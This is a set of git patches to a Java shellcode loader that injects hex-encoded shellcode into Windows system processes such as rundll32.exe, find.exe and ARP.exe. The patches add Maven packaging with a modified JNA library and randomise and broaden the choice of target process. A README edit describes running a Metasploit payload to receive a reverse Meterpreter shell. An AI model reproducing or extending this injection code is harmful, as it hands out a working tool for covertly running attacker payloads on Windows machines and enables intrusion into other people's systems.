From 347bba69b70aa679505c38d3a3c418c407a37157 Mon Sep 17 00:00:00 2001
From: yzddmr6 <yzddmr6@gmail.com>
Date: Wed, 21 Jun 2023 14:48:09 +0800
Subject: [PATCH 1/4] =?UTF-8?q?=E6=94=AF=E6=8C=81maven=E6=89=93=E5=8C=85?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .gitignore                                    | 33 +++++++++++++++++++
 pom.xml                                       | 14 +++++---
 src/main/java/asexploits/ShellcodeLoader.java |  2 +-
 src/main/resources/assembly.xml               | 27 +++++++++++++++
 4 files changed, 71 insertions(+), 5 deletions(-)
 create mode 100644 .gitignore
 create mode 100644 src/main/resources/assembly.xml

diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..4544264
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+# Compiled class file
+*.class
+
+# Eclipse
+.project
+.classpath
+.settings/
+
+# Intellij
+*.ipr
+*.iml
+*.iws
+.idea/
+.vscode/
+
+# Maven
+target/
+
+# Gradle
+build
+.gradle
+
+# Log file
+*.log
+log/
+
+# out
+**/out/
+
+# Mac
+.DS_Store
+
+temp/
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index fda7eef..67f48ed 100644
--- a/pom.xml
+++ b/pom.xml
@@ -28,7 +28,13 @@
 <!--            <artifactId>jna-platform</artifactId>-->
 <!--            <version>4.1.0</version>-->
 <!--        </dependency>-->
-
+        <dependency>
+            <groupId>net.java.dev.jna</groupId>
+            <artifactId>jna-platform</artifactId>
+            <version>1.2.0</version>
+            <scope>system</scope>
+            <systemPath>${project.basedir}/lib/tinyjna.jar</systemPath>
+        </dependency>
     </dependencies>
 
     <build>
@@ -60,9 +66,9 @@
                             <mainClass>asexploits.ShellcodeLoader</mainClass>
                         </manifest>
                     </archive>
-                    <descriptorRefs>
-                        <descriptorRef>jar-with-dependencies</descriptorRef>
-                    </descriptorRefs>
+                    <descriptors>
+                        <descriptor>src/main/resources/assembly.xml</descriptor>
+                    </descriptors>
                 </configuration>
                 <executions>
                     <execution>
diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index a4eed6b..22d6d8e 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -18,7 +18,7 @@ public class ShellcodeLoader {
     static Kernel32 kernel32;
     static IKernel32 iKernel32;
     public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
-    public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\notepad.exe", "C:\\Windows\\System32\\ARP.EXE"};
+    public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"};
 
     static {
         kernel32 = (Kernel32) Native.loadLibrary(Kernel32.class, W32APIOptions.UNICODE_OPTIONS);
diff --git a/src/main/resources/assembly.xml b/src/main/resources/assembly.xml
new file mode 100644
index 0000000..0345be0
--- /dev/null
+++ b/src/main/resources/assembly.xml
@@ -0,0 +1,27 @@
+<assembly>
+
+    <id>jar-with-dependencies</id>
+
+    <formats>
+        <format>jar</format>
+    </formats>
+
+    <includeBaseDirectory>false</includeBaseDirectory>
+    <dependencySets>
+        <!-- 默认的配置 -->
+        <dependencySet>
+            <outputDirectory>/</outputDirectory>
+            <useProjectArtifact>true</useProjectArtifact>
+            <unpack>true</unpack>
+            <scope>runtime</scope>
+        </dependencySet>
+
+        <!-- 增加scope类型为system的配置 -->
+        <dependencySet>
+            <outputDirectory>/</outputDirectory>
+            <useProjectArtifact>true</useProjectArtifact>
+            <unpack>true</unpack>
+            <scope>system</scope>
+        </dependencySet>
+    </dependencySets>
+</assembly>
\ No newline at end of file

From ec7a5f48a4dcef50e14a2651833701e8fde707a7 Mon Sep 17 00:00:00 2001
From: yzddmr6 <yzddmr6@gmail.com>
Date: Wed, 21 Jun 2023 14:54:31 +0800
Subject: [PATCH 2/4] Update README.md

---
 README.md | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 8e8ae23..f05406e 100644
--- a/README.md
+++ b/README.md
@@ -10,9 +10,7 @@
 
 ## 编译
 
-当前版本使用的jna经过魔改，不支持maven编译。
-
-需要使用idea的构建工件功能进行打包，具体方法请咨询百度。
+maven package
 
 ## 使用
 
@@ -42,7 +40,7 @@ java -jar ShellcodeLoader.jar --x64 shellcode_hex
 No encoder specified, outputting raw payload
 Payload size: 354 bytes
 Final size of hex file: 708 bytes
-fce88f0000006089e531d2648b5xxxx
+fce88f0000006089e531d2648b5....
 ```
 
 然后开启监听
@@ -59,7 +57,7 @@ exploit -j
 ### 客户端
 
 ```
-java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5xxxx
+java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....
 ```
 
 即可收到反弹的Meterpreter

From 3ec80024c49af461cd86913b7474b2cd8b022255 Mon Sep 17 00:00:00 2001
From: yzddmr6 <yzddmr6@gmail.com>
Date: Wed, 21 Jun 2023 15:53:44 +0800
Subject: [PATCH 3/4] Update ShellcodeLoader.java

---
 src/main/java/asexploits/ShellcodeLoader.java | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index 22d6d8e..bdd6e11 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -17,7 +17,7 @@
 public class ShellcodeLoader {
     static Kernel32 kernel32;
     static IKernel32 iKernel32;
-    public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\chcp.com", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\diskcomp.com", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
+    public static String[] ProcessArrayx32 = {"C:\\Windows\\SysWOW64\\ARP.exe", "C:\\Windows\\SysWOW64\\at.exe", "C:\\Windows\\SysWOW64\\auditpol.exe", "C:\\Windows\\SysWOW64\\bitsadmin.exe", "C:\\Windows\\SysWOW64\\bootcfg.exe", "C:\\Windows\\SysWOW64\\ByteCodeGenerator.exe", "C:\\Windows\\SysWOW64\\cacls.exe", "C:\\Windows\\SysWOW64\\CheckNetIsolation.exe", "C:\\Windows\\SysWOW64\\chkdsk.exe", "C:\\Windows\\SysWOW64\\choice.exe", "C:\\Windows\\SysWOW64\\cmdkey.exe", "C:\\Windows\\SysWOW64\\comp.exe", "C:\\Windows\\SysWOW64\\Dism.exe", "C:\\Windows\\SysWOW64\\esentutl.exe", "C:\\Windows\\SysWOW64\\expand.exe", "C:\\Windows\\SysWOW64\\fc.exe", "C:\\Windows\\SysWOW64\\find.exe", "C:\\Windows\\SysWOW64\\gpresult.exe"};
     public static String[] ProcessArrayx64 = {"C:\\Windows\\System32\\rundll32.exe", "C:\\Windows\\System32\\find.exe", "C:\\Windows\\System32\\fc.exe", "C:\\Windows\\System32\\ARP.EXE", "C:\\Windows\\System32\\expand.exe"};
 
     static {
@@ -53,6 +53,10 @@ public static void main(String[] args) {
         jnaLoader.loadShellCode(shellcode, is64);
     }
 
+    public void loadShellCode(String shellcodeHex) {
+        this.loadShellCode(shellcodeHex, false);
+    }
+
     public void loadShellCode(String shellcodeHex, boolean is64) {
 
         String[] targetProcessArray = null;

From 484f58e43d3857bbb0ab6bf69ee9559f980cf5fc Mon Sep 17 00:00:00 2001
From: yzddmr6 <yzddmr6@gmail.com>
Date: Tue, 27 Jun 2023 16:35:41 +0800
Subject: [PATCH 4/4] =?UTF-8?q?=E5=A2=9E=E5=BC=BA=E5=85=BC=E5=AE=B9?=
 =?UTF-8?q?=E6=80=A7?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 src/main/java/asexploits/ShellcodeLoader.java | 44 ++++++++++++++++---
 1 file changed, 37 insertions(+), 7 deletions(-)

diff --git a/src/main/java/asexploits/ShellcodeLoader.java b/src/main/java/asexploits/ShellcodeLoader.java
index bdd6e11..2e48247 100644
--- a/src/main/java/asexploits/ShellcodeLoader.java
+++ b/src/main/java/asexploits/ShellcodeLoader.java
@@ -12,6 +12,7 @@
 import com.sun.jna.win32.StdCallLibrary;
 import com.sun.jna.win32.W32APIOptions;
 
+import java.io.File;
 import java.util.Random;
 
 public class ShellcodeLoader {
@@ -60,21 +61,50 @@ public void loadShellCode(String shellcodeHex) {
     public void loadShellCode(String shellcodeHex, boolean is64) {
 
         String[] targetProcessArray = null;
+        //打乱数组顺序
+        shuffleArray(ProcessArrayx64);
+        shuffleArray(ProcessArrayx32);
         // java是64位且选择注入64位shellcode
         if (System.getProperty("sun.arch.data.model").equals("64") && is64) {
-            targetProcessArray = ProcessArrayx64;
+            targetProcessArray = mergeArrays(ProcessArrayx64, ProcessArrayx32);
         } else { //默认注入32位进程
-            targetProcessArray = ProcessArrayx32;
+            targetProcessArray = mergeArrays(ProcessArrayx32, ProcessArrayx64);
+        }
+        String targetProcess = null;
+        for (int i = 0; i < targetProcessArray.length; i++) {
+            targetProcess = targetProcessArray[i];
+            if (new File(targetProcess).exists()) {
+                break;
+            }
         }
-        int j = targetProcessArray.length;
-        byte b = 0;
-        Random random = new Random();
-        int k = b + random.nextInt(j);
-        String targetProcess = targetProcessArray[k];
         this.loadShellCode(shellcodeHex, targetProcess);
 
     }
 
+    public static void shuffleArray(String[] arr) {
+        Random rand = new Random();
+        for (int i = arr.length - 1; i > 0; i--) {
+            int index = rand.nextInt(i + 1);
+            String temp = arr[i];
+            arr[i] = arr[index];
+            arr[index] = temp;
+        }
+    }
+
+    public static String[] mergeArrays(String[] a, String[] b) {
+        String[] c = new String[a.length + b.length];
+        int i = 0;
+        for (String s : a) {
+            c[i] = s;
+            i++;
+        }
+        for (String s : b) {
+            c[i] = s;
+            i++;
+        }
+        return c;
+    }
+
     public void loadShellCode(String shellcodeHex, String targetProcess) {
         System.out.println("targetProcess: " + targetProcess);
         byte[] shellcode = hexStrToByteArray(shellcodeHex);